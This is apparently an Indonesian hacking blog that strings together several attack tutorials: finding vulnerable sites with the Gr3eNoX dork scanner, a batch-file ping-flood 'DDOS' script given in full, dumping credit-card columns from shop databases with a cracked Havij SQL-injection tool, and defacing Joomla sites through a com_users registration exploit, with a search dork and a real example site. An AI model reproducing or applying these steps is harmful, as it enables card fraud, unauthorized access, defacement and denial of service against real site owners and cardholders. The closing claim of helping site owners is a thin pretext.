Gr3eNoX adalah Sebuah Aplikasi pencarian Web Yang biasa digunakan oleh para Defacer, dan Carder, yang di buat oleh orang yang mempunyai Nickname : Gr3eNoX
Sebenarnya Gr3eNoX sama dengan Google Search Engine, hanya saja Gr3eNoX dapat mencari Website yang Mempunyai kelemahan dan rentan untuk di Hack.
Jika belum punya Silahkan Download
Berikut Langkah-langkahnya:
1. Masukan Dork
2. Klik "Search" Untuk mencari web Yang berkaitan dengan dorknya
3. setelah muncul webnya Klik "Start" untuk Mencari Website yang Vuln/rentan
Demikian Langkah-langkahnya, Mudah bukan??
Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.Cara Membuat DDOS Sendiri dengan NotepadCopas Kode berikut ke Notepad:@echo off
mode 67,32
title DDOS KoMpuTer InterNet
color 0c
cls
echo ===========================
echo = ./DKSH KoMpuTer InterNet\. =
echo ===========================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server +
echo + Author : Maulana Sarjana Muda +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo * Masukan IP / Host Target *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
- Simpan Dokumen Tersebut Dengan Format [.Bat] [Lihat Gambar Biar Jelas]
Inilah Tampilan DDOS Buatan Sendiri, [Kreasikan Lagi Yah Biar lebih Keren]
Semoga Bermanfaat
Apa itu Carding? Tentunya Anda semua sudah tahu. Kalau belum tahu Silahkan baca Artikel Pengertian Hacking, Carding, Defacing,dan Cracking.
Sebelum mulai Carding, kita harus menyediakan alat-alatnya terlebih dahulu.Berikut Alat-Alat yang mungkin mudah Anda gunakan:1. Gr3eNoX ( Download DISINI )3. DORK ( Download DISINI )2. Havij 1.6 Portable Full Crack ( Download DISINI )
Langkah-langkahnya:- Siapkan WEB yang Vuln (RENTAN), silahkan cari dulu web vuln dengan Dork dan Gr3eNoX, Jika Anda belum tahu cara mencari Web Vuln dengan Gr3eNoX, Silahkan Baca Artikel Cara Mencari Web Vuln dengan Gr3eNoX. Jika Dork Sudah Sering digunakan orang, Anda juga bisa mengembangkan Dork. Silahkan Baca Cara Mengembangkan Dork Sendiri.
- Setelah Anda mendapatkan Web Vuln, Silahkan Buka Havij 1.6 yang tadi Anda Download/ yang Anda Miliki. Tempatkan URL Web yang vuln tadi ke Havij, kemudian Klik "Analyze".
Jika sudah, maka akan ada tulisan berwarna hijau Seperti gambar Dibawah, lalu masuk ke menu "Table".
Setelah masuk kemenu "Table" Kemudian Klik "GDBs" (Get DataBase). Jika memang ada Database dalam web tersebut maka akan muncul. Lebih jelasnya lihat gambar Dibwah
Kemudian Anda centang /Checklist pada DataBasenya ( Lihat Gambar Di Atas ). Lalu Klik "Get Tables", maka akan mucul Tabel-tabel yang ada pada database tersebut, Lihat Gambar Dibawah:
Setelah itu Anda Centang/ Checklist pada tabel yang biasanya mengandung Credit Card/ Kartu Kredit. Misal pada web itu pada tabel "yahm_orders". Kemudian klik "Coloumns". Maka akan muncul beberapa coloumn dari tabel tersebut. Lihat Gambar.
Anda akan melihat Coloumns yang berisi data tentang Credit card, Expired Credit Cardnya, dll.
Silahkan Anda centang/ checklist coloumn tersebut, misal pada web ini: "order_Cardnub". Jika sudah, klik "Get Data". Lihat Gambar supaya lebih jelas.
Demikianlah cara Carding dengan Havij yang bisa saya sampaikan. Mohon maaf apabila perkataan saya kurang jelas, dan sulit untuk Anda pahami.
Catatan:
- Tidak semua web yang vuln bisa terlihat Database/Tabel/Coloumnya.
- Tidak semua web yang vuln terdapat Credit Card/Kartu Kreditnya.
- Tidak ada yang Sulit jika kita mau berusaha dan tidak kenal dengan kata Menyerah.
Deface, Deface, dan Deface. Buat yang ingin tahu apa itu Deface?, Silahkan Baca Pengertian Hacking, Defacing, Cracking, Carding. Itu sudah menjadi Hobby untuk para DEFACER ataupun para Newbie yang ingin sekali bisa Deface Website dengan cara apapun.
Syarat yang harus di penuhi untuk Deface Web metode Com_User Diantaranya
1. ALAT TEMPUR
2. Website harus Vulnerable/Rentan untuk di deface, Cara mengetahui Website Joomla yang vuln yaitu dengan menambahkan "/administrator" pada Site Misal http://leansolutions.com.mx/administrator. Berikut Perbedaan Website Joomla Yang Vuln/Rentan dan yang tidak Vuln.
Web yang VULNERABLE/RENTAN Kedua garis berdekatan.
Web yang NO VULNERABLE Kedua garis berjauhan.
Inilah Langkah-langkahnya:
- Cari websitenya di google dengan dork, misal : intext:�joomla! 1.7 � Open Source Content Management� site:mx . Dork bisa Anda ganti dan kembangkan sendiri, Silahkan baca Cara Mengembangkan Dork Sendiri.
- Masuk ke halaman "Registrasi" pada web tersebut dengan cara menambahkan:" /index.php?option=com_users&view=registration " setelah alamat web. dan jangan lupa Copy URL Tersebut ke EXPLOIT JOOMLA yang Anda miliki.
- Klik Kanan pada halaman Registrasi, kemudian pilih "View Page Source".
- Tekan "CTRL+F", lalu ketik: hidden . Copykan Code tersebut ke Exploit Anda.
- Buka Exploit Joomla dengan Notepad :Paste'kan URL (lihat gambar langkah ke 2), dan Code tadi, kemudian Save.
- Buka Exploit Joomla dengan Google Crhome/Mozilla, Lalu isikan datanya. INGAT: Password harus berbeda pada Exploit. Jika sudah klik "Register".
- Maka Anda akan di bawa ke halaman Registrasi web tersebut dan Anda Dimintai untuk memasukan Password yang sama. Silahkan Masukan Password yang sama.
- Jika Berhasil, silahkan Cek Email dan Verifikasi ( Jika Tidak Ada Di inbox/Kotak Masuk, maka silahkan Cek Di menu Spam/Sampah). Dalam langkah ini terkadang Administrator web menolak akses tersebut, jadi web gagal di Deface.
Setelah Anda Verifikasi, Silahkan langsung Login ke Administratornya. INGAT: Bahasa Diganti dengan "English (United Kingdom)".
- Selamat,Anda Berhasil Memasuki Website Orang Lain. Untuk mengganti tampilan website dengan tampilan deface Anda Silahkan Masuk ke "Template"
- Lihat Template site yang Ada tanda bintangnya(Default). Kemudian Klik "Templates".
- Klik Template Site tadi yang sekarang menjadi Default.
- Pilih "Edit main page template"
- Silahkan Script tersebut Ganti dengan Script Deface Anda, Asalkan... Berani Bertindak Berani Bertanggungjawab.
Demikian Cara Deface dengan Metode Com_User,Jika ingin mengganti Index.php silahkan Baca Cara Menebas Index.php dengan Menanam Shell. Semoga Bisa Anda pahami dan semoga Bermanfaat untuk Anda yang punya Website Joomla agar Segera meningkatkan keamanan Website, Sebelum para defacer/newbie mengetes security bahkan mengacak-acak website Anda.
Nitip Nickname: D.K.S.H